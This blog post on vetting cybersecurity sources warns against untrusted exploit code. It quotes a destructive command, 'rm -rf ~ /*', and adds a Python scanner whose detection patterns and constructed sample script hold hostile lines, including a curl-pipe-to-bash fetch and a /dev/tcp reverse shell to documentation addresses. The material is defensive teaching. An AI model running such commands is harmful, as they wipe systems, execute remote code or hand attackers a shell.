Vetting Your Sources
Hello all,
This post takes a different direction from the previous posts, which focused mainly
on technical knowledge and tools, and talks about one of the most important tasks in
cybersecurity: information gathering. Not information gathering as in port scanning a
client or doing Google searches on a target (though the concepts in this post can be
used for that), but information gathering as in making sure one is pulling data from
valid sources and avoiding disinformation. As a cyber-security professional it's
important to have a list of sources that are well vetted and/or backed by an
organization or government agency. Given the vast number of organizations, agencies,
and institutions involved in cybersecurity, finding a legitimate information source
that covers a topic specific to your need can be difficult.
Let's start with some major organizations that come to mind when discussing
cyber-security. According to Cybercrime Magazine there are 33 cybersecurity industry
associations. To be honest, I just did what I'm recommending against, and that is to
hop onto Google search to find this list and take the first hit I see. However, I did
look at their About page and read what their organization is about. To avoid jumping
down the rabbit hole of "can we know if anything can be accepted as true and accurate",
let's take this magazine's word that the content they're providing is accurate. Some of
the organizations they've listed are (Cybersecurity Ventures, 2019):
- (ISC)2 – Global not-for-profit leader in education and certification.
- SANS – Develops, maintains, and open-sources research papers on cybersecurity.
- OWASP – Not-for-profit organization responsible for developing and maintaining the open-source web application testing tool OWASP ZAP.
Hmmm, maybe this site isn't as accurate or inclusive as previously thought. This list
covers a good chunk of cybersecurity industry associations, but 33 is nowhere near the
number of cybersecurity firms, organizations and government agencies that contribute to
cybersecurity. For example, I do not see the NSA, Microsoft, or Offensive Security in
this list. The contributions to cybersecurity from these organizations and agencies are
also vast and noteworthy.
Keeping a list of these organizations in a spreadsheet somewhere is not a bad idea. If
you come across an organization that has well-vetted, quality-assured content, don't be
afraid to bookmark it. For example, Microsoft has a great page dedicated to security
engineering, and you can trust this source because it comes straight from the vendor of
the operating system you are most likely using right now:
As mentioned above, SANS is also an excellent resource for information. The SANS
Cyber-defense Whitepapers page is a great source of research papers. The link to this
site can be found below:
So far, we've listed some widely accepted and available sources of information and
briefly covered how to make sure a source is legitimate (e.g. look at the About page).
Let's say we find a post on GitHub; how do we vet this post? For starters it helps to
look at the author and their history. Do they have a LinkedIn profile that demonstrates
experience and knowledge in the industry? What are the comments and open issues saying
about their post, and does the commit history show the code being maintained and
reviewed by others? GitHub is a great source of knowledge, but care must be taken when
using content from GitHub.
Here's an example. Let's say we are researching malware and find a nice exploit we'd
like to try. The code we'd like to try makes a call to the following bash command
(Offensive Security, 2019):
rm -rf ~ /* 2> /dev/null &
This does far more than clean up a working directory. `~` is the home directory (root's
home on a default Kali install), and because of the space after it, `/*` is a second
argument that the shell expands to every top-level entry of the filesystem, so the
whole system is deleted recursively. GNU rm's refusal to run `rm -rf /` does not help
here, because the shell has already expanded the glob into individual paths. The
`2> /dev/null` throws away the error messages and the trailing `&` runs the command in
the background, so the victim may not notice anything until the system is gone. Using
code from the internet requires close examination before it goes anywhere near a
penetration test. Thankfully, there are sources that examine published code before
making it available. One of these is the Exploit Database maintained by Offensive
Security (even there, prefer entries the EDB team has marked as verified, and still
read the code before running it):
This database not only contains the exploit code but also its date, type, platform, and
whether it has been verified. Granted, this site is not an all-inclusive catalog of the
exploits that exist, but it's a great start. Other sites that are useful for finding
exploits include SecurityFocus and the Common Vulnerabilities and Exposures (CVE) list;
note that CVE catalogs vulnerability identifiers and references to advisories and fixes
rather than exploit code, so it is a starting point for research, not a place to
download exploits. GitHub is once again a great source of exploits, but again care must
be taken when downloading from that site or any other site on the internet.
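What does "care" look like in practice? Before anything pulled from GitHub or another site is run, read it, and let a script point you at the lines that deserve the closest reading. The following Python script is an added example for this post, not code from the original page, from Offensive Security, or from any repository: it does a first static pass over a downloaded proof of concept and flags a recursive rm aimed at the home directory or the filesystem root (such as the command above), remote content piped straight into a shell, decoded payloads fed to a shell, reverse-shell primitives, and Unicode control characters that can hide text from a code review. The sample proof of concept it scans is constructed for this example (the host name and address in it are reserved for documentation), and the regexes are deliberately broad assumptions; a clean result means only that the obvious traps are absent, not that the code is safe.

```python
"""
Static triage of an untrusted script before anyone runs it.

Added example, not code from the original post or from any organization it
names. The patterns and the sample script are constructed for illustration.
"""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int    # 1-based line number in the scanned text
    severity: str   # "high" or "info"
    label: str      # what the pattern is looking for
    snippet: str    # the offending line, stripped


# Deliberately broad regexes (assumptions for this example): the goal is to
# force a human to read the flagged lines, not to decide a script is safe.
RISKY_PATTERNS = [
    ("high", "recursive rm whose target is ~, $HOME, / or /*",
     re.compile(r"\brm\s+(?:-\S*[rR]\S*\s+)(?:\S+\s+)*?[\"']?(?:~|/\*?|\$HOME|/)[\"']?(?=\s|$)")),
    ("high", "remote content piped straight into a shell",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("high", "decoded payload piped into a shell or eval'd",
     re.compile(r"\bbase64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b|\beval\s+\"?\$\(")),
    ("high", "reverse shell primitive (/dev/tcp or nc -e)",
     re.compile(r"/dev/tcp/\d|\b(?:nc|ncat|netcat)\b[^\n]*\s-e\s*/bin/(?:ba)?sh\b")),
    ("info", "errors discarded and command backgrounded (easy to miss)",
     re.compile(r"2>\s*/dev/null\s*&(?!&)")),
]

# Bidirectional overrides and zero-width characters can make code render
# differently from how it executes (the "Trojan Source" trick).
BIDI_OR_ZERO_WIDTH = re.compile("[\u200b-\u200f\u202a-\u202e\u2066-\u2069\ufeff]")


def scan_script(text: str) -> List[Finding]:
    """Return every risky line in `text`, in file order (one finding per pattern)."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if BIDI_OR_ZERO_WIDTH.search(line):
            findings.append(Finding(line_no, "high",
                                    "bidi or zero-width control character (hidden text)",
                                    line.strip()))
        for severity, label, pattern in RISKY_PATTERNS:
            if pattern.search(line):
                findings.append(Finding(line_no, severity, label, line.strip()))
    return findings


def worst_severity(findings: List[Finding]) -> str:
    """'high' if any high finding, 'info' if only informational ones, else 'clean'."""
    if any(f.severity == "high" for f in findings):
        return "high"
    return "info" if findings else "clean"


# Constructed sample of what a careless "proof of concept" from a random repo
# might look like. example.invalid and 203.0.113.5 are reserved for documentation.
SAMPLE_POC = """\
#!/bin/bash
# proof of concept (constructed for this example, not a real exploit)
TARGET=${1:-127.0.0.1}
echo "[*] checking $TARGET"
curl -s http://example.invalid/stage2.sh | bash
rm -rf ~ /* 2> /dev/null &
rm -rf /tmp/poc_build
bash -i >& /dev/tcp/203.0.113.5/4444 0>&1
echo "[*] done" # looks harmless\u202e
"""

if __name__ == "__main__":
    results = scan_script(SAMPLE_POC)
    for f in results:
        print(f"line {f.line_no:>3} [{f.severity}] {f.label}: {f.snippet}")
    print("verdict:", worst_severity(results))
```

Run it against a file with `scan_script(open(path, encoding="utf-8").read())`. Note that the ordinary `rm -rf /tmp/poc_build` on line 7 of the sample is not flagged, while the `rm -rf ~ /*` from the post is, and that the `2> /dev/null &` on the same line gets its own informational hit: a script that hides its errors and backgrounds itself is exactly the kind of thing a reviewer should pause on.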
Vetting sources requires some legwork, but in the end it's worth it. Having information
from a site that is backed by experts provides peace of mind. Other great sources of
information include educational institutions. Again, care should be taken when using
these sources; if the institution's name is not recognized, look for its accreditations.
Don't be afraid even to pick up the phone and get in touch with the faculty.
Finally, I promised earlier that we would not explore the rabbit hole of "how do you
know if anything is true or accurate", but let's delve down that hole for a bit anyway.
The concrete answer to that question is that we don't. Incorrect or inaccurate
information can creep into even the most strictly reviewed sites and sources. A huge
part of our industry involves constant learning and adaptation. We strive to be as
accurate as possible but at the same time readily accept when we fail and learn from
it. It's this constant struggle that defines professionalism in this (or arguably any)
field.
References:
- Cybersecurity Ventures. (2019). Cybersecurity Industry Associations. Retrieved from https://cybersecurityventures.com/cybersecurity-associations/#home/?view_1_page=2
- Offensive Security. (2019). Exploit Database. Retrieved from https://www.exploit-db.com/